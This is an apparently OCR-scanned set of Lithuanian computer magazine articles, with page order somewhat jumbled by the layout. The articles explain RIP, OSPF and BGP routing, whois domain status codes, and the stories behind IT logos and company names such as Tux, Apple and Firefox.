Pagrindiniai RIP protokolo darbo principai Skaičiavimo iki begalybės demonstracija 


OSPF protokolo 
suformuotas grafas 


1->2 
B->2 
A->1 


O dabar tarkim, kad maršrutizatorius B šiuos duomenis jau per- 
davė anksčiau. Tuo pačiu maršrutizatoriuje D jau spėjo susifor- 
muoti lygiai tokia pati lentelė. Tokiu atveju lentelėje esančios ir 
gautos metrikos bus vienodos. Tuomet D tiesiog ignoruos to- 
kius duomenis ir neišsaugos jų atmintyje. Tas pats nutiktų ir tuo 
atveju, jeigu D gautų metrikas, kurios viršytų jos turimus duo- 
menis iki to paties tinko. 

Po tam tikro laiko visi maršrutizatoriai žinos apie visus bendros 
autonominės sistemos tinklus. Po to apsikeitimas duomenimis 
vyks kas 30 sekundžių, tačiau jeigu duomenys apie tinklą nebu- 
vo gauti per paskutines 180 sekundžių, tai maršrutizatorius met- 
riką iki to tinklo prilygins 16, kas bylos apie šio tinklo neprieina- 
mumą. Taip aptinkami šliuzų atjungimai arba kanalų avarijos. 
Pasitaiko tokių atveju, kuomet susidaro nestandartinės situaci- 
jos, vadinamos „užsiciklinimais“ arba „skaičiavimais iki begaly- 
bės“. Šie kenksmingi reiškiniai užteršia tinklą melaginga infor- 
macija ir gali trukti iki pusvalandžio. Užsiciklinimas įvyksta po 
vieno iš tinklų atjungimo, kuomet kitas maršrutizatorius kaimy- 
nui praneša apie tai, jog tinklas yra prieinamas per jį (tokiu 
atveju, jeigu kaimynas nespės maršrutizatoriui pranešti apie ne- 
prieinamą tinklą). Taip tarp maršrutizatorių susidaro kilpa. 
Siekiant išvengti kilpų, RIP protokole yra įvesti du apribojimai. 
Pirmasis vadinamas „horizonto padalinimo taisykle“. Jis byloja, 
kad maršrutizatorius A neturi siųsti duomenų maršrutizatoriui C 
apie tinklą B, jeigu pastarasis jam pranešė apie tinklą B. Kitaip 
tariant, maršrutizatorius nesiunčia informacijos apie tinklą kai- 
mynui, jeigu prieš tai duomenis apie šį tinkla gavo būtent iš jo. 
Antrasis apribojimas įpareigoja šliuzą pakeisti maršruto metri- 
ką, jeigu ją išsiuntė tas pats maršrutizatorius. Šie papildymai 
dalinai išgelbėja nuo kilpų, tačiau ne visada. Pasitaiko, kad marš- 
rutizatorius iš kito maršrutizatoriaus melagingus duomenis gau- 
na grandine. Tačiau mes nesigilinsime į tokius sudėtingus niu- 
ansus :). 

Skaičiavimas iki begalybės įvyksta tuomet, kai nelaiku praneša- 
ma apie tam tikrą situaciją. Tuo pačiu melagingas maršrutas gali 
egzistuoti, kol tinklo metrika netaps lygia 16. Štai kaip tai vyksta. 
Tarkim, įvyko netikėtas 1 tinklo atjungimas. Maršrutizatorius 
A, aptikęs ryšio dingimą, šliuzams B ir C išsiunčia atstumo 
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vektorių 1->16. Iki šliuzo C ši informacija atkeliavo iš karto 
ir jis laiku pakeitė maršrutą (pagal antrąjį apribojimą). Tačiau 
šliuzo B ši informacija nepasiekė (įvyko užlaikymas). Tuo me- 
tu šliuzas B maršrutizatoriui C siunčia informaciją apie tai, 
kad A tinklas prieinamas per jį, o jo metrika lygi 2. Maršruti- 
zatorius C priima šią informaciją, padidina metriką vienetu ir 
išsiunčia duomenis toliau į šliuzą A. Tarkim, per tą laika 
paketas su atstumo vektoriumi 1->16 vis dėlto pasiekė šliuzą 
B. Tačiau tuo pačiu atėjo ir paketas su metrika 3 iš to paties 
šliuzo A. Finale visa ši informacija visuose trijuose maršruti- 
zatoriuose cirkuliuos tol, kol visose lentelėse nebus nurodyta 
metrika 16. Šis reiškinys buvo pavadintas „skaičiavimu iki 
begalybės“. 

Su juo kovojama dviem būdais: pakeitimų užšaldymu (kuomet 
šliuzas, gavęs duomenis apie tinklo atjungimą, tam tikrą laiką 
nepriima duomenų apie šį tinkla), arba trigeriniais atnaujini- 
mais (duomenų apie neprieinamą tinklą išsiuntinėjimo be už- 
delsimo atveju, nepriklausomai nuo einamos laikmačio reikš- 
mės). Tačiau net ir šie metodai RIP sistemoje negali garan- 
tuoti šios problemos eliminavimo. 

Pasibaigus tam tikram laikui kaimynai vienas su kitu apsikei- 
čia specialiais HELLO pranešimais, kurie informuoja apie tai, 
kad kaimynas sveikas ir gyvas :). Tuo atveju, jeigu maršruti- 
zatorius dėl Kokių nors priežasčių atsijungė, kitas maršruti- 
zatorius tuojau pat išsiuntinėja šiuos atnaujintus duomenis 
apie kaimynus, kad toks miręs šliuzas būtų išbrauktas. Visi 
maršrutizatoriai pradeda performuoti maršrutus, kurie kelia- 
vo per atjungtą Maršrutizatorių. Taip OSPF protokolo tinklo 
aktyvumas praktiškai lygus nuliui, o pikas pasiekiamas tik 
apsikeitimo informacija stadijoje. 

Manau, visai suprantama, kad su dažnais kanalų atjungi- 
mais maršrutų perskaičiavimas ir apsikeitimas papildomais 
duomenimis bus ganėtinai apčiuopiamas net ir OSPF atveju. 
Būtent todėl visai autonominei sistemai nėra būtina naudoti 
vieną lentelę. Protokole numatytas sistemos dalinimas į at- 
skiras zonas, Kur kiekvienoje jų bus panaudotas atskiras OSPF 
procesas. 

Kalbant apie metrikas, tai OSPF atveju viskas kur kas patogiau, 
nei RIP protokole. Čia metrika reiškia jau ne praeinamų mazgų 
iki paskirties taško skaičių, o kanalo pralaidumą (vieno bito per- 
davimo laiką kas 10 nanosekundžių). Pavyzdžiui, Ethernet atveju 
ši metrika lygi 10, o Fast Ethernet atveju vienetui. 56 Kb/s 
kanalui metrika bus 1785. Pilna tam tikro maršruto metrika yra 
visų tarpinių kanalų suma. Tuo pačiu OSPF niekada paketo ne- 


[0SPF — geriausias protokolas 

vidiniam maršrutizavimui| 

RIP pakeitė OSPF protokolas, kuriame nebėra 15 mazgų ap- 
ribojimo ir kuriame minimizuojamas tarnybinis tinklo srau- 
tas. Jis priskiriamas //ink-state protokolų klasei, 0 jo darbas 
vyksta dviem etapais: 

1. Kiekvienas maršrutizatorius po įjungimo į visas savo sąsa- 
jas išsiunčia informaciją visiems savo kaimynams, panaudo- 
damas Link-State tipo pranešimą. 

2. Susidaręs pilną tinklo vaizdą, maršrutizatorius pradeda 
ieškoti optimalaus kelio iki kiekvieno tinklo, panaudodamas 
specialų Dijkstros algoritmą (Dijkstra taip pat sugalvojo ir se- 
maforus, naudojamus OS teorijoje). 


praleis per dialup Kanalą, net jeigu per ji iš karto Ir pasiekiamas 
paskirties taškas (hop count = 1), jeigu yra galimybė tai pada- 
ryti per Fast Ethernet, nors tarpinių mazgų skaičius čia gali siek 
ti ir 3-4. 

Derėtų paminėti, kad OSPF moka duomenis siųsti iš karto 
keliais kanalais, kas tuo pačiu sumažina tinklo apkrovimą. 
Tačiau tokiu atveju galioja apribojimas pagal metriką. Išsa- 
mesnių detalių gali paieškoti pačioje OSPF teorijoje, ka- 
dangi visos šio protokolo subtilybės niekaip netilps į vieną 
straipsnį. 


[BGP suartina sistemas] Pabaigai aš papasakosiu apie 
išorinį protokolą BGP (Border Gateway Protocol). Šiuo metu 
yra išleista ketvirtoji protokolo versija, kuri neturi konku- 
rentų. Protokolo veikimo principas labai paprastas: auto- 
nominės sistemos pasienio šliuzuose aprašytos tam tik- 
ros taisyklės, pagal kurias maršrutizatorius siųs paketus 
per savo sąsajas. Tarkim, jeigu administratorius aprašė tai- 
syklę pagal paros laiką, tai dieną duomenys bus siunčiami 
per viena sąsają, 0 naktį per kitą. Taip pat galima kla- 
sifikuoti tinklo srautą pagal prioritetą, informacijos kokybę 
it panašiai. Visi pasienio šliuzai būtinai tarpusavyje kei- 
čiasi maršrutizavimo lentelėmis. Dėl to tokiam maršruti- 
zatoriui keliami ganėtinai rimti disko posistemės ir našu- 
mo reikalavimai. Bet panaudojus maršrutų sumavimo me- 
chanizmą galima apčiuopiamai sumažinti perduodamos in 
formacijos dydį. 


[Ką pasirinkti? Spręsk pats!] Jeigu tau reikia pasirinkti 
maršrutizavimo protokolą, tu turėtumei pasverti visus „už“ ir 
„prieš“. Viena vertus, gremėzdiškas OSPF gali viską ir dar 
šiek tiek, tačiau jis ryja daug resursų. Kita vertus niekas ne- 
trukdo naudotis RIPv2 (antrosios versijos RIP protokolas), kuris 
išmoko suprasti potinklio kaukes ir autentifikacija, ko nemo- 
kėjo jo pirmtakas. 


ĮMaršrutų sumavimas] Yra vienas įdomus maršrutų su- 
mavimo metodas panaudojant trumpesnes kaukes, kurį ga- 
lima panaudoti daugelyje tinklo protokolų. Pavyzdžiui, pas 
mus yra du tinklai, prijungti prie vieno maršrutizatoriaus. 
Pirmojo adresas yra 192.168.1.0/25, o antrojo 
192.168.1.128/25. Abiejų tinklų duomenis galima lengvai 
apjungti į vieną bendrą 192.168.1.0/24 ir po to šią infor- 
maciją perduoti aukščiau stovinčiam maršrutizatoriui. Fi- 
nale maršruto paieška vyks kur kas greičiau, 0 per ryšio ka- 
nalus perduodamų duomenų apie maršrutizavimą bus dvi- 
gubai mažiau. 

Jeigu yra du tinklai, kurių potinklio Kaukė, tarkim, lygi /26, ir 
kurie nėra vienas kito kaimynai (juos apjungus nesusidaro išti- 
sinė adresų erdvė), tuomet sumuoti maršrutų negalima. Gali- 
mas toks atvejis, kuomet toks per klaidą apjungtas potinklis yra 
visiškai kitoje vietoje, tačiau maršrutizatorius apie tai nežinos. 
Vertėtų atminti, kad RIPv1 nesupranta potinklio kaukių, todėl 
maršrutų sumavimą galima panaudoti tik BGP OSPF ir RIPv2 
protokoluose. 


(0) Kai užklausi informacijos apie domeną, whois ser- 
veris grąžina lentelę, kurią sudaro keletas laukų. 

Kai kurie iš jų aprašo informaciją apie savininką 
(admin), DNS serverius ir panašiai. Su jais viskas 
aišku, tačiau kaip iššifruoti būsenos lauko (STATUS) 
reikšmę? Dažnokai sutinku visiškai skirtingas šio lauko 
reikšmes. 


Prieš pradedant aiškinimą, aptarkime kitas dvi są- 
vokas: registratorius ir registratūra. Registratūra (re- 
gistry) tai speciali organizacija, kuri palaiko Kon- 
krečią domeno zoną (pavyzdžiui, com). Registrato- 
rius (registrar) — kompanija, kuriai leista registruoti do- 
menus šioje zonoje. 
ACTIVE. Šią būseną pagal nutylėjimą gauna visi nauji 
domenai. Registratorius turi pilną priėjimą prie dome- 
no atributų ir gali juos keisti kaip tinkamas. Tokio do- 
meno delegavimas (aptarnavimas) gali būti pratęstas. 
REGISTRY-LOCK. Žodis LOCK parodo tai, kad registra- 
torius neturi teisės keisti domeno atributų ir juos šalin- 
ti, tačiau gali pratęsti delegavimą. Tam, kad registrato- 
rius galėtų modifikuoti domeno parametrus, reikia, kad 
registratūra pakeistu būseną REGISTRY-LOCK. 
REGISTRY-HOLD. Šią būseną, kaip ir REGISTRY -LOCK, 
priskiria registratūra. Registratorius negali pakeisti šio 
domeno atributų, tačiau jis gali pratęsti jo aptarnavi- 
mą. Skirtumas tarp REGISTRY-HOLD ir REGISTRY-LOCK 
tame, kad pirmuoju atveju informacija apie domeną 
patalpinama į Zone File (speciali duomenų bazė, ku- 
rioje yra domenų pavadinimų ir IP adresų atitikmenys), 
o antruoju ne. 
REGISTRAR-HOLD. Registratorius paprastai nurodo bū- 
tent šią būseną. Tokiu atveju domeno kontrolė pilnai 
gula ant domeno savininko (tai yra tavo, jeigu dome- 
nas registruotas tavo vardu) pečių. 
O pats registratorius negali pašalinti ir modifikuoti pa- 
rametrų, tačiau gali pratęsti aptarnavimą. 
REGISTRAR-LOCK. Tas pats, kas ir REGISTRAR-HOLD, 
skirtumas tik tame, kad su šia būsena informacija apie 
domeną įtraukiama į zonų bylą. REGISTRAR-HOLD at- 
veju taip nedaroma. 
REGISTRY-DELETE-NOTIFY. Tokią būseną laikinai gali 
nurodyti registratūra, kai pasibaigia domeno aptarnavi- 
mo laikas. 
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KIEKVIENA SAVE GERBIANTI ORGANIZACI- 
JA IR KOMPANIJA TURI PAVADINIMĄ IR LO- 
GOTIPĄ, KURIE MAKSIMALIAI TIKSLIAI PER- 
TEIKIA JŲ VEIKLOS PRASMĘ. BEJE, DAZNAI 
TAI BŪNA TIESIOG GRAZŪS SIMBOLIAI, KU- 
RIE NEATSPINDI JOKIOS KONKREČIOS IDĖ- 
JOS. TAS PATS PASAKYTINA IR APIE INFOR- 
MACINIŲ TECHNOLOGIJŲ PASAULĮ. VISI 
MES ZINOME, KAD PINGVINAS YRA LINUX 
OPERACINĖS SISTEMOS EMBLEMA, O MA- 
CINTOSH KOMPIUTERIUS GAMINANTI KOR- 
PORACIJA VADINASI „APPLE“. TACIAU KO- 
DĖL BŪTENT TAIP? JEIGU NORI SUŽINOTI, 
NEPERVERSK PUSLAPIO. 


Pingvinas Tuksas ir kompanija 

[Operacinės sistemos] Operacinė sistema tai daugiame 
tis tūkstančių programuotojų darbas, milijonai kodo eilučių, O 
dažnai ir labai dideli pinigai. Kad projekto neištiktų nesėkmė, 
svarbu įvertinti kiekvieną smulkmeną, net ir emblemą bei OS 
pavadinimą. Pavyzdžiui, FreeBSD simbolis simpatiškas de- 
monas, kurio vardas Beastie. Fryškės kūrėjai nėra satanistai ir 
jie nerašo okultinių programų, tiesiog anglų kalboje žodis dae- 
mon reiškia gerąją dvasią, kartais ir tiesiog energingą, veržių 
žmogų. O štai unix tipo sistemose daemon tai techninis ter- 
minas, reiškiantis programas, kurios fone nepastebimai atlieka 
koki nors naudinga darbą. Ir vėl tiesiog peršasi sulyginimas su 
nematoma geraja dvasia. 

Artimos FreeBSD sistemos OpenBSD kūrėjai talismanu 
pasirinko spygliuotą žuvelę fugu. Sis vandens gyventojas gali 
išsipūsti taip, jog pradinį savo dydį viršija tris kartus, be to, yra 
pati nuodingiausia žuvis pasaulyje. Kaip tikriausiai Ir pats su 
pranti, ši žuvelė jūrų platybėse plaukioja būdama visiškai tikra, 
kad jos niekas nepuls valgyti. Lygiai taip pat ir OpenBSD varto 
tojai, | globalujį tinklą išeina be baimės, kad jų sistemą kas 
nors nulauš ne veltui ši OS garsėja savo saugumu. Pačią 
saugiausią planetos operacinę sistemą kuriantys vyrukai ne 
stokojantys fantazijos žmonės. Kiekvienam naujam sistemos 
leidimui sukuriamas specialus disko viršelis, kur puffy (būtent 
toks žuvelės vardas) pasirodo vis kitu pavidalu. Pavyzdžiui, vieną 
kartą ji pasirodė laukinių vakarų šerifo pavidalu, 0 kitą kaip 
OS šalies burtininkė. Visus šiuos paveikslėlius galima rasti ad 
resu Www.openbsd.org/orders.htmi. 


Toliau sąraše — NetBSD. Anksčiau šios sistemos logotipu buvo 
velnių gauja su vėliava, stovinti ant sudaužytų monitorių ir sis- 
teminių blokų krūvos. Tikriausiai OS kūrėjai tikėjosi išgąsdinti 
konkuruojančius projektus ir parodyti kūrimo proceso nefor- 
malumą — sunku būtų įsivaizduoti komercinį projektą su to- 
kio pobūdžio emblema. Tiesa, šiandien iš NetBSD simbolio 
teliko vėliava. Panašu, jog kūrėjai šiek tiek paaugo, tapo atsa- 
kingesni ir rimtesni... 

„Apple“ kompiuteriams skirtos operacinės sistemos — Mac 
0S emblema yra besišypsantis veidelis. Kaip tvirtina Mac'ų 
gerbėjai, jie įsimylėjo savo sistemą vos išvydę šį logotipą. Aš 
pats pirmenybę teikiu kuklesniems vaizdeliams, nei paveiks- 
lėliai iš keturių linijų ir poros taškų, tačiau nepaisant to, „Ap- 
ple“ dizainerius pagerbti taip pat reikia. Tokia emblema turėjo 
parodyti sistemos draugiškumą vartotojo atžvilgiu, jos papras- 
tumą ją perprantant ir dirbant. 

Microsoft operacinės sistemos logotipą žino visas pasaulis. 
Tai langelis (o ne grotos, kaip sarkastiškai tvirtina daugelis 
uniksoidų). Tiesa, šis langas pavaizduotas kaip vėliava tai 
savotiška kolektyvo vėliava, progreso ir judėjimo simbolis. Ko- 
kia gi dar, jeigu ne langas, emblema galėtų būti Windows sis- 
temoje? Patys langai buvo taip pavadinti todėl, kad tai buvo 
pirmoji operacinė sistema su grafine vartotojo sąsaja ir pro- 
gramų langais, kurie pakeitė Kkomandinę eilutę (Ne visai taip. 
Pirmosios grafinės vartotojo sąsajos su langais buvo pristaty- 
tos dar 70-aisiais metais. O pirmą kartą juos panaudojo kom- 
panija „Apple“ savo OS 80-ųjų viduryje — red.past.). 
Naujasis Bilo Geitso kūrinys garbingai pavadintas Longhorn. Es- 
mė tame, kad netoli nuo centrinės M$ būstinės yra kalnų slidi- 
nėjimo kurortas, kuriame mėgsta ilsėtis kompanijos darbuoto- 
jai (užuot taisę OS saugumo skyles), o vietinis salūnas pavadin- 
tas „Longhorn“. Štai taip. Pelningiausias planetos produktas taip 
pavadintas aludės garbei. Be abejo, tai neoficiali versija, tačiau 
kitos tiesiog nėra. Kokį logotipą sugalvoti operacinei sistemai, 
kuri vadinasi „Ilguoju ragu“? Logiška, kad tai bus stambaus ra- 
guočių atstovo atvaizdas. „Microsoft“ apsistojo ties jaučiu. Ir 
kas po to drįs teigti, kad rimtos programinės įrangos simbolis 
negali būti gyvūnas? 


[TUX] Pingvinas Tuksas - tai ne šiaip sau Linux simbolis. Aš net 
nežinau, kas yra žinomesnis — pati OS, ar jos logotipas. Atribu- 
tika su Tukso atvaizdu parduotuvėms neša ne mažesnį pelną, 
nei linuksiniai distributyvai. Aš tiesiog negalėjau pro jį praeiti. 
Šis logotipas atsirado 1996 metais, kuomet linux-kernel-mailing 
list pašto forume grupė žmoniu pasiūlė išsirinkti savo operaci- 


Atsargiai 


Mėgiamiausias Stywo Džobso vaisius atkeliauja ugnine lape! 


nės sistemos emblemą. Idėja buvo palaikyta, po ko buvo pa- 
siūlyta daugybė variantų, taip pat ir tokių kilmingų žvėrių, kaip 
liūtas ir erelis. Tarp pasiūlytų logotipų buvo ir pingvinas, kuris 
ant sparnų laikė Žemės rutulį. Tačiau visų linuksoidų vadas ir 
dievas Torvaldsas viename iš savo laiškų paminėjo štai ką: „Jei- 
gu jūs mastote apie „pingviną“, tai turėtumėte įsivaizduoti šiek 
tiek nusipenėjusį sėdintį pingviną, kuris yra gerai pavalgęs ir 
atsirūgęs. Šypsosi patenkintas savimi — pasaulis atrodo tie- 
siog nuostabiai, jeigu tu ką tik suvalgei keletą šviežios žuvies 
galonu...“. 

Tarp dailininkų buvo paskelbtas geriausio pingvino atvaizdo kon- 
kursas. Laimėtoju tapo Laris Ivingas, kuris tvirtina, kad piešda- 
mas Tuksą jis naudojo tik laisvą programinę įrangą, taip pat Ir 
rastrinį redaktorių GIMP (kur gi jis sakys, kad naudojo fotošo- 
pa!). Iš tiesų pingviną derėtų teisingai vadinti „Taksu“, tačiau 
tarp kompiuteristų nusistovėjo Tukso vardas. Žodį galima pa- 
aiškinti taip: Torvalds UniX. 

Beje, per vieną Linuso gimtadienį jis dovanų gavo tikrą pingvi 
niuką, kuri dabar galima pamatyti Bristolio zoologijos sode. 


[IT kompanijos] Metas papasakoti apie informacinių techno 
logiju sferoje dirbančių kompanijų emblemas. Pradėsime nuo 
„Apple“. Esmė tame, kad obuolys mėgiamiausias Kompani- 
jos įkūrėjo Styvo Džobso vaisius. Po trijų mėnesių mastymų, 
koks turėtų būti naujosios kompanijos pavadinimas, Džobsas 
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nera nieko genau už kavos puodelį! 


[Ožiukas Frenkas ir Haroldas Mėlyndantis] 

Ožiukas Frenkas — portalo livejournal.com talismanas. Kaip 
rašoma jo asmeniniame puslapyje, Frenkas padeda progra- 
muoti, atsako į techninio palaikymo tarnybos skambučius. 
Khm. O štai čia ne itin vykęs livejournal kūrėjų pokštas: pa- 
reikšti, kad jų techninio palaikymo tarnyboje sėdi, labai atsi- 
prašau, ožiai — ne pats geriausias sprendimas. 

Haroldas Mėlyndantis — tai Skandinavijos viduramžių kara- 
lius. Valdė išmintingai, vienijo vikingus, pavertė krikščionybę 
vietine religija. O po tūkstančio metų kiti skandinavai iš kom- 
panijos „Ericsson“ sukūrė naują belaidę duomenų perdavi- 
mo technologiją. Ji buvo pavadinta „mėlynuoju dantimi“ — 
bluetooth, kas visam pasauliui pademonstravo šiaurės tau- 
tų pagarbą senosioms praeities kartoms. 
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savo partneriams pareiškė: „Aš kompaniją pavadinsiu „Apple“, 
jeigu iki 5 valandų jūs nesugalvosite nieko geriau“. Ir arba su 
Džobsu tuo metu dirbo ne patys didžiausi eruditai, arba jie tie- 
siog tingėjo kankintis kažką galvodami, tačiau niekam į galvą 
nešovė jokia geresnė mintis. Apple's Macintosh — obuolių rū- 
šis, kurios vardu buvo pavadinta naujoji kompanija ir jos pro- 
dukcija. Pagal kitą versiją, korporacija taip buvo pavadinta Bitlų 
garso įrašų studijos garbei „Apple corp.“, kadangi daugelis 
kompanijos vadovų ir darbuotojų buvo Liverpulio ketveriukės kū- 
rybos gerbėjai. Tačiau istorija nutyli, kodėl emblemoje vaizduo- 
jamas atkąstas vaisius. Lyderiaujančio nešiojamųjų kompiute- 
rių gamintojo pavadinimas „Toshiba“ sudarytas iš dviejų dalių: 
Tuo (rytai) ir Shiba (žolė). Kaip gi susiję kompiuteriai ir žolė? 
Viskas labai paprasta: korporacija atsirado susijungus dviems 
pramonės gigantams — „Tokyo Electric“ ir „Shibaura“, iš ko ir 
kilo naujasis pavadinimas — „Tokyo Shibaura“, sutrumpintai 
„Toshiba“. 

Žymusis komplektuojančių dalių gamintojas „Fujitsu“ taip pa- 
vadintas Fudzijamos kalno garbei. Japonams Fudzijama - šven- 
tovė, nacionalinis turtas ir jų visas japoniškumas apskritai, to- 
dėl čia nėra nieko keisto. 

Įdomi „Canon“ istorija. Iš pradžių korporacija vadinosi „Kwa- 
non“ — toks buvo budistų gailestingumo deivės vardas. Tačiau 
deivė su tūkstančiu rankų, kuri buvo pavaizduota emblemoje, 
Europos publikos skoniui netiko. Kompanija pakeitė savo pava- 
dinimą į skambesnį „Canon“, kas turi daugybę gilių religijos ir 
kūrybos reikšmių, bei iš logotipo pašalino deivę. 

„Viewsonic“, vienas iš stambiausių pasaulio monitorių ga- 
mintojų, savo emblemoje įtupdė tris skirtingų spalvų papū- 
gas (tai kanarėlės :) — red.past.). Čia nereikia sukti galvos ir 
ieškoti prasmės — paprasčiausias rinkodaros triukas. Gra- 
žūs spalvoti paukščiukai traukia pirkėjus ir gerai dera prie 
monitorių. 

Stambiausio pasaulyje ryšio operatoriaus ATėT logotipas 
gaublio pavidalo. Jis simbolizuoja mūsų planetą, apraizgytą ko- 
munikacijų tinklu. Mano kuklia nuomone, jų logotipą derėtų pa- 
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keisti: nors pas juos Amerikoje ryšys visur puikus, kai Kur Afriko 
je arba šiaip nuošalesnėse vietose mobiliojo ryšio telefono ge- 
riau neimti, nes iš jo vis tiek nebus naudos. 

Laisvos programinės įrangos, kuria atstovauja GNU (GNU Not 
Unix) projektas, emblema yra antilopė. Iš tiesų, kam sukti galvą 
ir ieškoti logotipo, kai tavo organizacija vadinasi GNU? Beje, 
šnekant angliškai, negalima pamiršti, kad žodyje antilopė gnu 
raidė £ yra netariama, todėl ištariant visą sutrumpinimą, šią 
raidę reikia būtinai praleisti (taip pasakė Stolmanas, 0 su juo 
geriau sutikti). 


[Programavimo kalbos] Programavimas — reikšmingas žo 
dis kiekvienam „Hakerio“ skaitytojui. Bemiegės naktys prie 
kompiuterio, knygos ir RTFM, kompiliatoriai ir derintuvai... 
Tačiau ne kiekvienas megaprogramuotojas žino, kodėl jo mė- 
giama kalba vadinasi būtent taip ir kodėl būtent tokia kalbos 
emblema. Pavyzdžiui, PERL -- tai Practical Extraction and Re 
port Language santrumpa, kas verčiama kaip „praktinio duo- 
menų išgavimo ir ataskaitų sudarymo kalba“. Perl simbolis 
kupranugaris. Ne, ne todėl, kad su šia kalba programuoti 
gali tik ištvermingi ir kantrūs, o todėl, kad tai simbolizuoja 
dykumos, asmenybės laivą. Tiesiog žymi knygų leidykla „O'Reil- 
ly“ ant knygos apie programavimą su Perl viršelio išspausdino 
kupranugarį — ten laikomasi tradicijos ant knygų apie kom- 
piuteriją viršelių spausdinti gyvūnus. Knyga tapo pasauliniu 
bestseleriu, o Afrikos gyvūnas ėmė asocijuotis su populiaria 
programavimo priemone. 

Dar viena gerai žinoma kalba python. Manai, jog ji taip pava- 
dinta gyvatės garbei? Iš tiesų ji taip pavadinta 70-ujų populia- 
raus komiško televizijos serialo „Mončio Pitono oro cirkas“ gar- 
bei, nes minėtos programavimo kalbos kūrėjas buvo šio serialo 
fanas. Beje, kūrėjai patys pamiršo python pavadinimo kilmės is- 
toriją, todėl jų emblemoje regime gyvatę. Multiplatforminės Java 
logotipas — garuojantis puodelis. Deja, oficialios šią emblemą 
paaiškinančio versijos nėra. Telieka manyti, kad tai lėmė visuoti- 
nis programuotojų pomėgis gerti kavą, nors vadovaujantis tokia 
logika simboliu turėtų būti alaus bokalas. Beje, lygiai taip pat, 
kaip ir ši programavimo kalba, vadinasi populiari kavos rūšis. 


[Programinė įranga] Viena populiariausių naršyklių Mazil- 
la — taip pavadinta apjungus žodžius Mosaic (pirmoji Internet 
naršyklė) ir Killer. Manau, kad žudikas čia reiškia tai, jog ši 


naršyklė yra Opera ir IE žudikė. O logotipe besipuikuojantis 
tiranozauras buvo pasirinktas dėl panašaus žodžių Mozilla ir 
Godžzilla sąskambio. 

Lengvesnė Mozilla versija vadinasi Firefox (ugninė lapė). Ši nar 
šyklė — buvęs Phoenix, O ji buvęs Firebird. Pavadinimų kaita 
aiškinama tuo, jog nuolat atsirasdavo kitas to paties pavadini- 
mo produktas. Kūrėjai, be abejo, nesidžiaugdavo, kad jų pava- 
dinimas naudojamas kituose svetimuose projektuose. Firefox 
emblema lapė, savo ugnine uodega apglėbusi Žemės rutulį. 
Atseit, ugninė lapė — greičiausia web naršyklė. Nors aš tai čia 
neieškočiau ypatingos idėjos, kadangi 4 kartus logotipą perpie- 
šę dizaineriai buvo pasiruošę pavaizduoti ir lapę, ir krokodilą ir 
net baltųjų lokių šeimą, kad tik po to nereikėtų logotipo perda- 
rinėti penktąjį kartą. 

Pranešimų siuntinėjimo programa ICO yra vienas iš populiariau- 
sių globalaus tinklo servisų visame pasaulyje. Kompaniją „Mi- 
rabilis“, kuri užtikrino ICO sistemos darbą, 1996 metais įkūrė 4 
Izraelio programuotojai. Mirabilis — tai mėgstanti saulę, aro- 
matinga ir nuodinga gėlytė, turinti haliucinogeninių savybių. Ma- 
tyt, izraeliečiai programuotojai taip pamėgo šiuos haliucinoge- 
nus, kad šios gėlytės garbei pavadino kompaniją ir panaudojo 
ją kaip emblemą. 

Viena iš populiariausių internete duomenų bazių valdymo sis- 
temų — PostgreSOL. Projekto simboliu buvo pasirinktas dram- 
blys, kadangi mėgiamiausia vieno iš lyderiaujančių kūrėjų kny- 
ga buvo Agatos Kristi „Drambliai gali prisiminti“. Nežinau, 
kaip susijusios duomenų bazės ir literatūra, tačiau faktas 
lieka faktu. 

Kalbant apie programine įrangą, negalima nepaminėti hakeriš- 
kų programų. Užėjus į oficialią geriausio visų laikų ir tautų pa- 
žeidžiamumų skenerio — www.insecure.org — svetainę, tave 
sutinka išraiškinga žiūrinti akis. Aš iš pradžių pamaniau, kad 
nmap kūrėjai prisižiūrėjo „Ziedų valdovo“, 0 po to kupini įspū- 
džių logotipu pasirinko viską matančią akį, tačiau paskui paaiš- 


„Drambliai gali prisiminu“ 


Anarchiškas NetBSD logotipas 


ViewSonic 


Džiunglės. papūgos, monitoriai... 


Vianas Iš kultinės 


gėlytės atvaizdavimo vanantų 


Antilope GNU 


Pitonas. Sumaniose rankose 


Stambiujų raguočių atstovas iš Redmonto rimtas programavimo ginklas 


kėjo, kad akis reiškia, jog nuo skenerio neimanoma nuslėpti 
nutolusiame kompiuteryje įdiegtos programinės įrangos pažei- 
džiamumų. 


[Pabaiga] Ka gi, man skirta vieta baigiasi. Papasakojau tau 
apie pačius įdomiausius pasaulio logotipus ir pavadinimus. 
Pasaulio, kuriame mes gyvename: tinklų Ir komunikacijų, kom- 
piuterių ir programinės įrangos, IT pasaulio. Dabar tu žinai 
prasmę tų dalykų, apie kuriuos anksčiau nė nesusimąstyda- 
vai. Beje, svarbiausia ne emblema ir ne pavadinimas, o 
tai, ką jie reiškia. Monitorių gamintojams svarbiausia jų 
ekrano kokybė, 0 ne kompanijos logotipas. Kad tavo gyvenimo 
kelyje pasitaikytų Kuo daugiau gražių emblemų, kurios sukur- 
tos kokybiškiems produktams. 


[Kai kurių IT korporacijų pavadinimų kilmė] 

Google — pavadinimas buvo pasirinktas dėl žodžio Googol, 
kas reiškia vienetą su šimtu nulių. O Google buvo parašyta 
ant čekio, kurį paieškos sistemos kūrėjai gavo nuo pirmos į 
juos investavusios firmos. Po to jie nusprendė portalą pava- 
dinti būtent taip. 

Hotmail — resurso įkūrėjui Džekui Smitui kilo mintis sukurti 
servisą, kuriame galima gauti priėjimą prie pašto per webą. 
Kai jis pradėjo perrinkinėti projekto pavadinimus, kurie bai- 
gėsi žodžiu mail, tai apsistojo ties hotmail, kadangi jame yra 
raidės HTML (HyperText Markup Language). 

Kodak. K — mėgiamiausia korporacijos įkūrėjo Džono Yst- 
meno raidė. Be to, ji visose pasaulio kalbose rašoma vieno- 
dai. Džonas ieškojo žodžių, kurie ir prasidėtų, ir baigtųsi šia 
geriausia pasaulio raide. Ir prašom, surado. 

Yahoo — žodį sugalvojo rašytojas Džonatanas Sviftas, taip 
nusakydamas blogą, niekšingą žmogų. Yahoo! įkūrėjai Džeris 
Jangas ir Deividas Filo savo servisą pavadino taip todėl, kad 
patys save tokiais laikė. Suprask, niekšeliai, tik amerikietiški. 
Oficialiai Yahoo išsišifruoja kaip Yet Another Hierarchical Offi- 
cious Oracle. Tikriausiai ilgai galvojo tokį paaiškinimą... 
Cisco buvo sukurta pagal legendą. Nuo vieno supersvarbaus 
dokumento kompanijoje nuplyšo gabalėlis, ant kurio buvo pa- 
rašytos šios penkios raidės, todėl vadovybė nusprendė, kad 
